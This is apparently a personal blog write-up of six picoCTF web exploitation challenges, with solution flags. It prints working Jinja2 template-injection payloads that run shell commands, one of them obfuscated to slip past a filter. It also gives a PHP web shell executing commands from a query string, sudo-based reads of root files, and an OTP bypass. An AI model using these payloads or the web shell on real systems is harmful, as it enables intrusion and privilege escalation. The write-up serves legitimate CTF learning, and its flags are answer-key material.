picoCTF Write up (Web Exploitation)

WalNut Lv1
  2025-03-13 19:46:08 2025-03-13 19:46:08 Created   2025-08-02 14:45:28 2025-08-02 14:45:28 Updated    1.1k Words  6 Mins  

放一些打過的題目在這,我很菜別噴我

Eazy

SSTI1

SSTI1

Hints
  • Server Side Template Injection
solve
1. Initial Input Reflection
  • Open the provided URL in a browser.
  • Enter any random text and click “OK”.
  • The input appears reflected in the response — indicating potential template rendering.
2. Identifying Template Engine

The challenge name SSTI suggests vulnerability to Server-Side Template Injection, which occurs when user input is rendered by a template engine without proper sanitization.

We test with known payloads to detect the engine :

Engine Test Payload
Jinja2(Flask/Django) {{ 7*7 }}
Freemarker(Java) ${7*7}
Velocity(Java) #set($a = 7*7)${a}
Twig(PHP) {{ 7*7 }}
Smarty(PHP) {$7*7}
Mako(Python) <% print 7*7 %>

Input :

1
{{ 5*9 }}

Output: 45 → confirms Jinja2 is in use and SSTI vulnerability is present.

3. Achieving Command Execution

We attempt a Command Injection payload using Jinja2 internals :
Input :

1
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('whoami').read() }}

Success → The server responds with the result of the whoami command — proving Remote Code Execution (RCE) is possible.

4. Finding the Flag

List the files :

1
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('ls').read() }}

The output includes a file named flag.

Final payload to read the flag :

1
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('cat flag').read() }}
flags picoCTF{s4rv3r_s1d3_t3mp14t3_1nj3ct10n5_4r3_c001_99fe4411}

n0s4n1ty 1

n0s4n1ty1

Hints
  • File upload was not sanitized
  • Whenever you get a shell on a remote machine, check sudo -l
solve
1. Discovering File Upload Vulnerability

Upon accessing the challenge instance, it’s clear that arbitrary files can be uploaded — indicating a file upload vulnerability. This allows for malicious script execution on the server.

2. Uploading a PHP Web Shell

Create a simple PHP shell script :

1
2
3
4
5
6
7
8
<?php
if(isset($_GET['cmd'])){
    echo "<pre>";
    $cmd = $_GET['cmd'];  // Get command from the query string
    system($cmd);         // Execute the command and display output
    echo "</pre>";
}
?>

Upload this file as webshell.php via the file upload form.

3. Triggering Remote Code Execution (RCE)

Access the uploaded shell via:

1
http://standard-pizzas.picoctf.net:63914/uploads/shell.php?cmd=whoami

Response → Confirms RCE by displaying the current user.

4. Checking Privileges

Execute :

1
http://standard-pizzas.picoctf.net:63914/uploads/shell.php?cmd=sudo -l

Output:

1
2
3
4
5
Matching Defaults entries for www-data on challenge:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on challenge:
    (ALL) NOPASSWD: ALL

This reveals that the current user (www-data) can run any command as any user without a password, including root.

Now you can execute any command as root, for example :

1
http://standard-pizzas.picoctf.net:63914/uploads/shell.php?cmd=sudo cat /root/flag.txt
flags picoCTF{wh47_c4n_u_d0_wPHP_4043cda3}

head-dump

head-dump

Hints
  • Explore backend development with us
  • The head was dumped.
solve
  1. Exploring the Web Application
    The challenge begins on a blog-like website. After launching the instance, I explored the various pages and found an article titled “API Documentation”. Clicking on it redirected me to /api-docs, which opened up Swagger UI—a web interface used for exploring and testing APIs.

Key Discovery: Swagger UI at /api-docs

  1. dentifying the Critical Endpoint
    Within Swagger, several API endpoints were listed. One stood out:

Endpoint: /heapdump (found under the Diagnosing section)

Its description mentioned memory analysis, which aligned with the challenge title, making it a prime target.

  1. Executing the Endpoint

Using Swagger’s “Try it out” feature, I invoked the /heapdump endpoint. This action generated and downloaded a .heapsnapshot file — essentially a memory dump of the server.

File downloaded: heapdump-.heapsnapshot

  1. Extracting the Flag

Memory dump files can be large and overwhelming. Rather than opening it manually, I used a simple command-line tool to scan for the flag format:

1
cat heapdump-1742808189103.heapsnapshot | grep "picoCTF"
flags picoCTF{Pat!3nt_15_Th3_K3y_46022a05}

Cookie Monster Secret Recipe

Hints
  • Sometimes, the most important information is hidden in plain sight. Have you checked all parts of the webpage?
  • Cookies aren’t just for eating - they’re also used in web technologies!
  • Web browsers often have tools that can help you inspect various aspects of a webpage, including things you can’t see directly.
slove
  1. Accessing the Challenge

Click the link provided in the portal. You’ll be directed to a Login Page.

  • Enter any random credentials, e.g., test:test
  • Click on the Login button

This results in an Access Denied message along with a hint:

💡 “Hint: Have you checked your cookies lately?”

  1. Investigating Cookies

Following the hint, open the Cookies tab in your browser’s developer tools.

You’ll notice a cookie named secret_recipe being set—even though the login failed.

  1. Decoding the Cookie
    Just Copy the value of the secret_recipe cookie and decode as Base64.
flags picoCTF{c00k1e_m0nster_l0ves_c00kies_DE7A5E76}

IntroToBurp

IntroToBurp

Hints
  • Try using burpsuite to intercept request to capture the flag.
  • Try mangling the request, maybe their server-side code doesn’t handle malformed requests very well.
solve
  1. Accessing the Challenge
    Click the link provided in the portal. You’ll be directed to a registration page.
  • Fill in the required registration details and submit.
  • The site will redirect you to an OTP verification page.
  1. Submitting a Fake OTP
  • Enter any random OTP like 0000 and click Submit.
  • The response will say: Invalid OTP.
  1. Capturing the Request with Burp Suite
    Go back to the OTP verification page and enter a new OTP again (can be anything).
    Intercept the request using Burp Suite and Send to Repeater.
    Delete the otp=XXXX and Click Send.
flags picoCTF{ #0TP_Bypvss_SuCc3$S_c94b61ac}

Medium

SSTI2

SSTI2

Hints
  • Server Side Template Injection
  • Why is blacklisting characters a bad idea to sanitize input?
solve
1. Initial Payload Blocked
1
{{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}

This is too obvious → modern filters/WAFs block dot access (.), globals, builtins, and keywords like import, os, eval.

2. Final Bypass Payload :
1
{{request|attr('application')|attr("\x5f\x5fglobals\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat flag')|attr('read')()}}
flags picoCTF{sst1_f1lt3r_byp4ss_0ef4bd3d}
On this page
picoCTF Write up (Web Exploitation)
  1. Eazy
    1. SSTI1
    2. n0s4n1ty 1
    3. head-dump
    4. Cookie Monster Secret Recipe
    5. IntroToBurp
  2. Medium
    1. SSTI2